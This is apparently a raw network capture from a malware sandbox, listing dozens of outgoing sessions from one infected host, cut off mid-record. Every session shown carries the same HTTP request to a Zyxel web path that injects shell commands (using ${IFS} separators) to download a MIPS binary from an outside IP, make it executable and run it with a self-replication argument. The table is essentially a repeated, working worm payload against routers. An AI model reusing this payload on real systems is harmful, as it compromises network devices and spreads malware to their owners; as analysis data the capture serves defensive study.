                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4154192.168.2.2360772200.216.130.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796489954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4155192.168.2.233433040.140.233.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796497107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4156192.168.2.233343023.170.148.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796546936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4157192.168.2.235053859.89.177.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796569109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4158192.168.2.2357858123.106.36.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796606064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4159192.168.2.235129639.211.34.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796636105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4160192.168.2.2339012196.161.16.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796665907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4161192.168.2.2339402128.216.248.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796689987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4162192.168.2.23468282.192.111.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796730042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4163192.168.2.233809869.210.117.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796787024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4164192.168.2.233362491.129.195.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796789885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4165192.168.2.234124649.3.86.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796823978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4166192.168.2.2350512123.97.164.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796854019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4167192.168.2.233844240.208.118.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796864986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4168192.168.2.233739044.199.131.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796911955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4169192.168.2.234674097.187.45.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796931028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4170192.168.2.235400085.25.162.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796941042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4171192.168.2.234975091.25.173.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.796979904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4172192.168.2.2336738155.122.75.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797022104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4173192.168.2.235443287.228.79.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797044039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4174192.168.2.2345708152.246.78.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797075987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4175192.168.2.2338008167.197.231.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797096014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4176192.168.2.235317252.133.216.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797115088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4177192.168.2.2359076112.179.155.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797138929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4178192.168.2.234104289.237.202.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797163010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4179192.168.2.235830418.158.37.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797183990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4180192.168.2.2354224169.35.167.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797224045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4181192.168.2.2358870106.30.146.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797255039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4182192.168.2.2345526110.112.182.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797300100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4183192.168.2.2356614126.27.82.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797329903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4184192.168.2.2336814147.85.141.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797353983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4185192.168.2.234483881.184.208.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797379971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4186192.168.2.2349780141.142.164.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797395945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4187192.168.2.23599104.17.132.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797452927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4188192.168.2.233495085.183.35.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797489882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4189192.168.2.2351288126.169.242.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797504902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4190192.168.2.234007479.76.226.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797547102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4191192.168.2.235287896.212.111.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797564983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192192.168.2.234956884.227.252.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797606945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4193192.168.2.2346784135.226.224.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797629118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4194192.168.2.234877467.48.244.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797661066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4195192.168.2.234106278.1.123.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797700882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4196192.168.2.235953895.16.127.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797719955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4197192.168.2.2339926168.8.179.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797736883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4198192.168.2.2351550213.20.43.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797765017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4199192.168.2.2336030113.118.162.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797780991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4200192.168.2.2336944114.149.166.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797826052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4201192.168.2.2339310207.31.108.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797837973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4202192.168.2.2359146121.250.99.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797866106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4203192.168.2.2338930184.127.12.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797914028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4204192.168.2.2348280156.137.53.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797946930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4205192.168.2.2339256181.20.170.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.797967911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4206192.168.2.2354884151.203.225.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798026085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4207192.168.2.2341986160.3.112.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798051119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4208192.168.2.2358634132.126.122.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798065901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4209192.168.2.2358916105.25.190.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798073053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4210192.168.2.2351322223.251.163.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798142910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4211192.168.2.234763668.191.238.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798163891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4212192.168.2.235826863.133.151.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798183918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4213192.168.2.2335336101.255.235.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798214912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4214192.168.2.235052895.230.100.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798248053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4215192.168.2.2359004186.96.139.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:24.798279047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4216192.168.2.234195295.35.107.48443
                                                TimestampBytes transferredDirectionData
